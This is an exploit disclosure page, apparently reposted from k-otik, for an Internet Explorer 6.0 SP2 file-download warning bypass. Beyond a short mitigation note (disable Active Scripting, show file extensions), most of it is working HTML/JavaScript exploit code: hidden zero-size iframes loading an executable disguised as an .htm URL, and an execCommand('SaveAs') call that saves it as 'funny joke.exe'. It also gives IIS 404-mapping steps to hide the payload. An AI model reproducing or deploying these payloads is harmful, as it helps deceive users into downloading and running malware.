Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as a HTML file. Full exploitation given. Original posted on k-otik.
5cf54bfc3b98194b62e01d674a293f76a8b55e5d1942178a1fcfe020e729bc73
<HTML><HEAD><TITLE>Internet Explorer 6.0 SP2 File Download Security
Warning Bypass Exploit</TITLE>
<BODY id=all text=#000000 vLink=#000020 aLink=#000020 link=#000020
bgColor=#e9e9e9 topMargin=10 marginheight="10" marginwidth="10">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="74%" id="AutoNumber4">
<tr>
<td width="100%">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber5">
<tr>
<td width="100%">
<p align="center"><b><font size="1" face="Verdana">Internet
Explorer 6.0 SP2 File Download Security Warning Bypass Exploit</font></b></td>
</tr>
</table><div align="center">
</div>
<font size="1"></font>
<div align="justify">
<pre><font face="Verdana" size="1">Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as a HTML file.
</font><font color="#FF0000" face="Verdana" size="1">Secunia did not release the technical details (aka Security by Obscurity) </font><font size="1" face="Verdana" color="#FF0000">thus</font><font color="#FF0000" face="Verdana" size="1"> we publish this page (aka Full Disclosure)</font></pre>
</div>
<pre><font face="Verdana" size="1"><b><u>Solution</u></b>
[EN] Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]
[FR] Désactivez Active Scriptig et l'option "Masquer les extensions des fichiers dont le type est connu [Panneau de
configuration -> Options des dossiers -> Affichage]
<u>Credits</u> : go to cyber flash
<u>How does it work ? A.K.A Exploit
</u>The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:</font></pre>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font face="Verdana"><font color="#000080" size="1"><html><br>
<body><br>
<iframe src</font><font color="#345487" size="1">='http://domain.com/v.exe?.htm'
</font><font color="#000080" size="1">name="NotFound" width="0" height="0"></iframe>Click<br>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');"><br>
here</a>.<br>
</body><br>
</html></font></font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Also, here's an example that
requires modifying the IIS Error Mapping Properties (see below):</font></p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font color="#000080" size="1" face="Verdana"><html><br>
<body><br>
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click<br>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');"><br>
here</a>.<br>
</body><br>
</html></font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Steps to configure IIS:</font></p>
<p><font size="1" face="Verdana">Launch Internet Information
Services manager.<br>
Under the 'Custom Errors' tab, modify the Error Mapping Properties
as follows:</font></p>
<ol type="i">
<li><font size="1" face="Verdana">Error Code: 404 </font></li>
<li><font size="1" face="Verdana">Default Text: Not Found </font>
</li>
<li><font size="1" face="Verdana">Message Type: URL </font></li>
<li><font size="1" face="Verdana">URL: /v.exe (name of the
executable)</font></li>
</ol>
<p><font size="1" face="Verdana">Within the HTML page, insert an
IFRAME as follows:</font></p>
<p><font color="#000080" size="1" face="Verdana"><iframe src='vengy404.htm'
name="NotFound" width="0" height="0"></iframe></font></p>
<p><font size="1" face="Verdana">The file 'vengy404.htm'
intentionally doesn't exist on the server, so it will trigger a 404
error message as defined above. But, the javascript code below
references the stealthy v.exe data within the frame 'NotFound' and
is linked to 'funny joke.exe' when prompted to save the file:</font></p>
<p><font color="#000080" size="1" face="Verdana">javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');</font><font face="Verdana" size="1"><br>
<br>